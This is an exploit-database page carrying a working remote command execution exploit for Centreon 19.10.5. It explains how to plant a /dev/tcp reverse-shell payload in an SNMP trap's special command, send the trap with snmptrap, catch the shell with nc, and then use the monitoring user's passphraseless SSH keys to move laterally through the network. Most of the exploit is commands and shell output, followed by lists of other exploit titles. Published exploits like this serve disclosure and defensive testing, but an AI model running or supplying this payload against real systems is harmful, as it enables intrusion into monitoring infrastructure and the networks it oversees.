Menu

Search for hundreds of thousands of exploits

"Centreon 19.10.5 - 'centreontrapd' Remote Command Execution"

Author

Exploit author

"Fabien AUNAY"

Platform

Exploit platform

php

Release date

Exploit published date

2020-01-29

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
# Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution 
# Date: 2020-01-29
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -

###########################################################################################################
Centreon 19.10.5 Remote Command Execution centreontrapd

Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.

It is possible to get a reverse shell with a snmp trap and gain a pivot inside distributed architecture.


Steps:
Objective 1 : Create a SNMP trap or use linkDown OID with special command in action 3
Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
Objective 3 : Assign service trap relation
Objective 4 : Get centreon id reverse shell

###########################################################################################################

# Objective 1 : Create or use SNMP trap OID with special command in action 3
- Configuration  >  SNMP Traps

[+] Trap name *     : linkDown
[+] OID *        : .1.3.6.1.6.3.1.1.5.3
[+] Special Command    : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121


# Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
- Configuration  >  Services  >  Services by host

[+] Description *        : TRAP RCE
[+] Linked with Hosts *        : YOUR-LINKED-HOST
[+] Check Command *        : App-Monitoring-Centreon-Service-Dummy
[+] DUMMYSTATUS            : 0
[+] DUMMYOUTPUT            : 0
[+] Passive Checks Enabled     : YES
[+] Is Volatile            : YES
[+] Service Trap Relation    : Generic - linkDown


# Objective 3 : Assign service trap relation
- Configuration  >  SNMP Traps
- linkDown
- Relations

[+] Linked services        : YOUR-LINKED-HOST - SERVICE DESCRIPTION

reload Central
Reload snmp config


# Objective 4 : Get centreon id reverse shell and think lateral

[+] Send your trap
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2

TIP: centreontrapd logfile:
2020-01-29 02:52:33 - DEBUG - 340 - Reading trap.  Current time: Wed Jan 29 02:52:33 2020
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance).  Will attempt to translate to a numerical OID
2020-01-29 02:52:33 - DEBUG - 340 -   Translated to .1.3.6.1.2.1.1.3.0
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0).  Will attempt to translate to a numerical OID
...
2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
...
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
..


NOTE: Read the doc !!!
https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen

The centreon id user shares configurations and instructions with satellite collectors trough SSH.
No passphrase used.
This allows you to move around the infrastructure after your RCE.


POC:

snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2

nc -lvnp 12345
Ncat: Version 7.50
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:38470.
id
uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker)
sudo -l
Matching Defaults entries for centreon on centreonlab:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty

User centreon may run the following commands on centreonlab:
    (root) NOPASSWD: /sbin/service centreontrapd start
    (root) NOPASSWD: /sbin/service centreontrapd stop
    (root) NOPASSWD: /sbin/service centreontrapd restart
    (root) NOPASSWD: /sbin/service centreontrapd reload
    (root) NOPASSWD: /usr/sbin/service centreontrapd start
    (root) NOPASSWD: /usr/sbin/service centreontrapd stop
    (root) NOPASSWD: /usr/sbin/service centreontrapd restart
    (root) NOPASSWD: /usr/sbin/service centreontrapd reload
    (root) NOPASSWD: /sbin/service centengine start
    (root) NOPASSWD: /sbin/service centengine stop
    (root) NOPASSWD: /sbin/service centengine restart
    (root) NOPASSWD: /sbin/service centengine reload
    (root) NOPASSWD: /usr/sbin/service centengine start
    (root) NOPASSWD: /usr/sbin/service centengine stop
    (root) NOPASSWD: /usr/sbin/service centengine restart
    (root) NOPASSWD: /usr/sbin/service centengine reload
    (root) NOPASSWD: /bin/systemctl start centengine
    (root) NOPASSWD: /bin/systemctl stop centengine
    (root) NOPASSWD: /bin/systemctl restart centengine
    (root) NOPASSWD: /bin/systemctl reload centengine
    (root) NOPASSWD: /usr/bin/systemctl start centengine
    (root) NOPASSWD: /usr/bin/systemctl stop centengine
    (root) NOPASSWD: /usr/bin/systemctl restart centengine
    (root) NOPASSWD: /usr/bin/systemctl reload centengine
    (root) NOPASSWD: /sbin/service cbd start
    (root) NOPASSWD: /sbin/service cbd stop
    (root) NOPASSWD: /sbin/service cbd restart
    (root) NOPASSWD: /sbin/service cbd reload
    (root) NOPASSWD: /usr/sbin/service cbd start
    (root) NOPASSWD: /usr/sbin/service cbd stop
    (root) NOPASSWD: /usr/sbin/service cbd restart
    (root) NOPASSWD: /usr/sbin/service cbd reload
    (root) NOPASSWD: /bin/systemctl start cbd
    (root) NOPASSWD: /bin/systemctl stop cbd
    (root) NOPASSWD: /bin/systemctl restart cbd
    (root) NOPASSWD: /bin/systemctl reload cbd
    (root) NOPASSWD: /usr/bin/systemctl start cbd
    (root) NOPASSWD: /usr/bin/systemctl stop cbd
    (root) NOPASSWD: /usr/bin/systemctl restart cbd
    (root) NOPASSWD: /usr/bin/systemctl reload cbd
Release DateTitleTypePlatformAuthor
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-17"VMWare Fusion - Local Privilege Escalation"localmacosGrimm
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-13"Centos WebPanel 7 - 'term' SQL Injection"webappslinux"Berke YILMAZ"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"webappsjava"RedTeam Pentesting GmbH"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
Release DateTitleTypePlatformAuthor
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection"webappsphp"Daniel Monzón"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
2020-03-11"Wordpress Plugin Search Meter 2.13.2 - CSV injection"webappsphp"Daniel Monzón"
2020-03-11"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading"webappsphp"Andrea Cardaci"
2020-03-11"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion"webappsphp"Andrea Cardaci"
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-10"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting"webappsphpEn_dust
2020-03-10"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution"webappsphp"Andrea Cardaci"
2020-03-10"Persian VIP Download Script 1.0 - 'active' SQL Injection"webappsphpS3FFR
2020-03-09"60CycleCMS - 'news.php' SQL Injection"webappsphpUnkn0wn
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"Sentrifugo HRMS 3.2 - 'id' SQL Injection"webappsphpminhnb
2020-03-04"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read"webappsphpNgoAnhDuc
2020-03-03"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection"webappsphpemaragkos
2020-03-03"Alfresco 5.2.4 - Persistent Cross-Site Scripting"webappsphp"Alexandre ZANNI"
2020-03-02"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)"webappsphp"Jinson Varghese Behanan"
2020-03-02"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)"webappsphp"Lucas Amorim"
2020-02-27"Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Meisam Monsef"
2020-02-26"PhpIX 2012 Professional - 'id' SQL Injection"webappsphpindoushka
2020-02-25"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass"webappsphpGeekHack
Release DateTitleTypePlatformAuthor
2020-01-29"Centreon 19.10.5 - 'centreontrapd' Remote Command Execution"webappsphp"Fabien AUNAY"
2020-01-28"Centreon 19.10.5 - Database Credentials Disclosure"webappsphp"Fabien AUNAY"
2020-01-28"Centreon 19.10.5 - Remote Command Execution"webappsphp"Fabien AUNAY"
2020-01-10"ASTPP 4.0.1 VoIP Billing - Database Backup Download"webappslinux"Fabien AUNAY"
2020-01-08"ASTPP VoIP 4.0.1 - Remote Code Execution"remotelinux"Fabien AUNAY"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47978/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse